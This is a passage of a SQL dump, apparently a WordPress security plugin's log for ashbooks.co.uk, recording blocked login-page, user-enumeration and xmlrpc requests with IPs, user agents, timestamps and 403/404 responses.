Firefox\\/72.0\"}','34LJTmE7UeM6ArNxcRfsHp5i',0,1636628934.1789,431,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-json/wp/v2/users/10','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','dzaRCJANBSb5kZejI8iPqGsQ',0,1636628934.7943,225,'','GET',403,0,520,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','SXPrtUkQexlcEVTgjZa8onBi',0,1636628936.8124,173,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','noEMlGt9gr6h1DOe8c7duzqm',0,1636628936.8332,198,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','kJEeWwq7Flonru9sf5BA4bYm',0,1636628936.9205,192,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','Lu4li3eW0kRbJaP9rXfphZnj',0,1636628936.9798,150,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','Z7uHcVfXaYgid5MG0LDW9QzA',0,1636628937.2790,180,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','2HcC9BoSNUG4DXZRumEnMyb3',0,1636628937.0378,429,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','ByMDhn9YxNApfSOcraUkoEFw',0,1636628937.4065,192,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','myYrwkpB0HEhMQL53c4n8v71',0,1636628937.2486,482,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','93IP8cQMSYjWa4oVtXFzrdTU',0,1636628937.7284,173,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','qUn5w2dbeSIzvr7NjphmRiaC',0,1636628937.7819,171,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','iQaojR40tJ8wygsX213xCHKB',0,1636628937.8392,183,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','aGnXxgMN684V2pocjtSTwFLd',0,1636628937.8645,478,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','AjhZqV6EfsS2i4zYOwnRG8Qp',0,1636628937.9121,430,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','tUMHyujgFJoIs685rcWXSdlw',0,1636628937.9573,385,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','lpuYQyR6Evs0ax7F5nMSHiTP',0,1636628938.3504,164,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','Z4aHgJoscPL9OyuAfQql7G1n',0,1636628938.1134,431,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','jtQKsBOhwcv8izqVAFToRglr',0,1636628938.8960,177,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','6aeQZEiWp1wBRuTUnmtIySNv',0,1636628939.1166,398,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','3z4XstCpuReB6KoihSck1f7V',0,1636628939.0785,464,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','wxdXsu1L9oPGpDEectYOz20A',0,1636628939.0881,464,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','gxV3aoUbehd6KSyWkwXL5DpZ',0,1636628939.3737,202,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','5wmBhPN4CYHqGtorZel2RLJV',0,1636628939.1318,557,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','GDPOW9kEHv1tUpi7bKqdxQge',0,1636628939.2933,437,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','oxmW4vq5EgCYL3GkzHbc6rlh',0,1636628939.7672,145,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','fbXaQMW7HkemwU9Y8FJ5DGEh',0,1636628940.3315,239,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','ctGFPxsWJUwrhinz0kSbYg95',0,1636628940.3487,260,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','ZYbCqFUD7So8GELOt4ji9xBc',0,1636628940.1188,527,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','18Cr6IitLOzupXAWJjcbmNFE',0,1636628940.1176,539,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','BADetcTYfn2bz9L60SMyj8O1',0,1636628940.2755,548,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','hdCFNr4fpc0BHwS9bUiYatjq',0,1636628940.7759,148,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','9LwrdpJXEAMO8cBZbC0Fuj1h',0,1636628940.7926,152,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','OaMjcz5PXJA21TEYU6Wgwuks',0,1636628940.9608,199,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','Uv4b6Zg3i1OdfDztIyPMAes0',0,1636628940.9184,488,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','K3EzA74kpacguSO8rM2FVUP6',0,1636628941.3897,296,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','gC73b0GTSaApsB1i4v8yFDHt',0,1636628941.3696,325,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','xJFyKQ1CgIkWtqfjSwTpd3AO',0,1636628941.3908,472,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','U7aXcizRMjglGhnqfZW0OA4F',0,1636628941.7758,180,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','NbGuRH5D98Qlhyrgt6ez4koX',0,1636628941.8722,216,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','sVnc8fyRKuawxbEmWNT70JAt',0,1636628941.9594,199,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','rQjufMDVL0sKUxgtZlOhSdHP',0,1636628941.9839,174,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','FOIntZUBTJdwsc4KRL8CG6Se',0,1636628942.1262,456,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','3OTjISdmQUEbBafYWyezDrPp',0,1636628942.1742,472,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','y7ExbUFXLVdlOAonahPYQ8Nk',0,1636628942.7763,201,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','k6ip5L0ZN8toWAUqTRbfOQIY',0,1636628942.8162,170,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','s2bulLoDJ5Kd9Q1q0OpSxfPV',0,1636628942.8454,199,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','eSzyUx6h09RKABoCPdwImntr',0,1636628942.9061,169,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','edRmqIS6WO7J5ojsfnvylBA4',0,1636628942.9768,155,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','DtLkGZ87VPQC01oWeFwXNBqu',0,1636628943.1124,724,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','cf1bv2J7o0hGsVFw8XmajUeH',0,1636628943.2527,726,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','op0IgNL8dyUSZHW4vODFPn9G',0,1636628943.9838,217,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','UaHkz6sjRBGftrEIbNJX8Ce5',0,1636628944.3069,227,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','HK7eTtQXwxAjlC1qhPnN6kZ3',0,1636628944.0760,467,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','S5pGPiwBqVj8MYDasL43X6AT',0,1636628944.3638,272,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','6E1gPCqKUB0Fv28JtmWQRYSb',0,1636628944.3416,295,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','x9dP7fhaADRCEHimYlv0y4bN',0,1636628944.4300,303,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','wheIimSxtHLuT7OqfBrZ80R4',0,1636628944.3232,474,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','ZL3fbmg7M0qpyQVYoTFJxG1K',0,1636628944.3272,602,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','2eOUf4WG9Tamdjqyc6Npo8wL',0,1636628944.9858,133,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','JEH0cihVR4WYZwLF9yAtkjlT',0,1636628945.0229,389,'','GET',404,0,700,0,1,'',0),('20.185.234.76',347728460,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko\\/20100101 Firefox\\/72.0\"}','MAihaqy4rIKHU7ecFsvRNblQ',0,1636628945.0738,384,'','GET',404,0,700,0,1,'',0),('103.149.154.8',1737857544,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/47.0.2526.111 Safari\\/537.36\"}','btkgGCKwVjpO7x2TJlYAEoB0',0,1636628987.1767,465,'','POST',403,0,600,0,1,'',0),('138.197.12.140',2328169612,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','DgzWsqT6bLweko091A5OfFNY',0,1636629728.8822,246,'','POST',403,0,600,0,1,'',0),('195.67.74.174',3275967150,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','Wfw9leULyN5jIZqEHVY8Fbki',0,1636630431.2492,894,'','POST',403,0,600,0,1,'',0),('139.59.118.238',2335930094,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.86 Safari\\/537.36\"}','5l9hQ1KJrOLIA4GcfSzCD8MN',0,1636631181.5154,717,'','POST',403,0,600,0,1,'',0),('122.128.106.186',2055236282,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','giBWJUn8w3TLZ2ECFX0qR7Nz',0,1636631985.7047,561,'','POST',403,0,600,0,1,'',0),('167.99.138.106',2808318570,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','eETialtsncLvXdN0DbrWzyB8',0,1636633716.3686,623,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2227.1 Safari\\/537.36\"}','ZdHIlFu9aEJoTvOQk6qzn2yt',0,1636636591.6242,503,'','POST',403,0,600,0,1,'',0),('167.114.144.40',2809303080,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/66.0.3359.117 Safari\\/537.36\"}','qfNYkXwp2aF71GKcvlyW0rd5',0,1636636648.8753,858,'','POST',403,0,600,0,1,'',0),('93.114.185.218',1567799770,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','v0Fs1G8BhbWRjcktO5mlxH6q',0,1636638569.4199,625,'','POST',403,0,600,0,1,'',0),('13.229.113.179',233140659,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','iG8BME2kuznyqH967xSZsRV3',0,1636641689.1331,2357,'','GET',403,0,520,0,1,'',0),('13.229.113.179',233140659,'','https://ashbooks.co.uk//wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\",\"2\":\"https:\\/\\/ashbooks.co.uk\\/\\/wp-login.php\"}','0Ud4TkwOqWAYjtXnlJK3roQF',0,1636641695.0020,1370,'','POST',403,0,600,0,1,'',0),('35.198.137.137',600213897,'','https://ashbooks.co.uk/wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/\\/\\/wp-json\\/wp\\/v2\\/users\\/\"}','zNV1SX84ogecRhb0273Um6as',0,1636645996.8651,146,'','GET',403,0,520,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','FsgeKkui360UNIrb482LO9Vp',0,1636647207.1182,545,'','POST',403,0,600,0,1,'',0),('150.136.39.104',2525505384,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','xmdDEoaOUXWJN1Ic2itM0fwY',0,1636648166.1435,1419,'','GET',403,0,520,0,1,'',0),('150.136.39.104',2525505384,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','fBDeNaxvsugir5RHwVzod846',0,1636648232.5455,162,'','GET',403,0,520,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','CHMaDYrghQUlpoxibAzq6jmP',0,1636657831.5490,602,'','POST',403,0,600,0,1,'',0),('193.23.3.40',3239510824,'','https://ashbooks.co.uk/about.php','','{\"1\":\"Python-urllib\\/2.7\"}','ocYfzA7naj2N6PybvU1OKeGl',0,1636661875.6346,459,'','GET',403,0,700,0,1,'',0),('193.23.3.40',3239510824,'','https://www.ashbooks.co.uk/about.php','','{\"1\":\"Python-urllib\\/2.7\"}','ONVpjay5lIf6YsozvKXukceW',0,1636662731.0355,376,'','GET',403,0,700,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','QZo8dVPrkLjzGROW1wDM9uiJ',0,1636668464.7445,680,'','POST',403,0,600,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2224.3 Safari\\/537.36\"}','fFRKPrvUQpOakLCYN20dxSnV',0,1636679090.6265,605,'','POST',403,0,600,0,1,'',0),('167.100.66.131',2808365699,'','https://www.ashbooks.co.uk/rss.php?type=atom','','{\"1\":\"Mozilla\"}','hny0FSkvMwc1VLtli2XoeqBI',0,1636679959.1722,423,'','GET',403,0,700,0,1,'',0),('88.135.37.49',1485251889,'','https://ashbooks.co.uk/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','CXnHqOubUG1e4BRmTapskAtW',0,1636686329.7503,71073,'','POST',403,0,515,0,1,'',0),('5.188.62.76',96222796,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','abR6ZqYBVG8395tHlur7MJ4d',0,1636689688.2936,785,'','POST',403,0,600,0,1,'',0),('18.117.186.188',309705404,'','https://ashbooks.co.uk/wordpress/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko\\/20100101 Firefox\\/94.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wordpress\\/wp-login.php\"}','9u7H4cvLeiAbyKqhNRlwM5jW',0,1636699633.5294,804,'','GET',403,0,700,0,1,'',0),('18.117.186.188',309705404,'','https://ashbooks.co.uk/blog/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko\\/20100101 Firefox\\/94.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/blog\\/wp-login.php\"}','syxiVLE0CXoW8QzbRcO5DBvJ',0,1636699633.3194,1050,'','GET',403,0,700,0,1,'',0),('18.117.186.188',309705404,'','https://ashbooks.co.uk/wp/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko\\/20100101 Firefox\\/94.0\",\"2\":\"http:\\/\\/ashbooks.co.uk\\/wp\\/wp-login.php\"}','rxjuatMofH7qkGciL9h8RsXA',0,1636699632.8772,1492,'','GET',403,0,700,0,1,'',0),('194.58.88.114',3258603634,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0 Safari\\/537.36\"}','pF34PVesb6H2RuDfXniQtj58',0,1636715811.7240,2522,'','GET',403,0,520,0,1,'',0),('89.207.146.189',1506775741,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.67 Safari\\/537.36\"}','oGrXUy5c2PMVOft3Ev9R6pAZ',0,1636721673.6616,732,'','POST',403,0,600,0,1,'',0),('81.88.52.205',1364735181,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 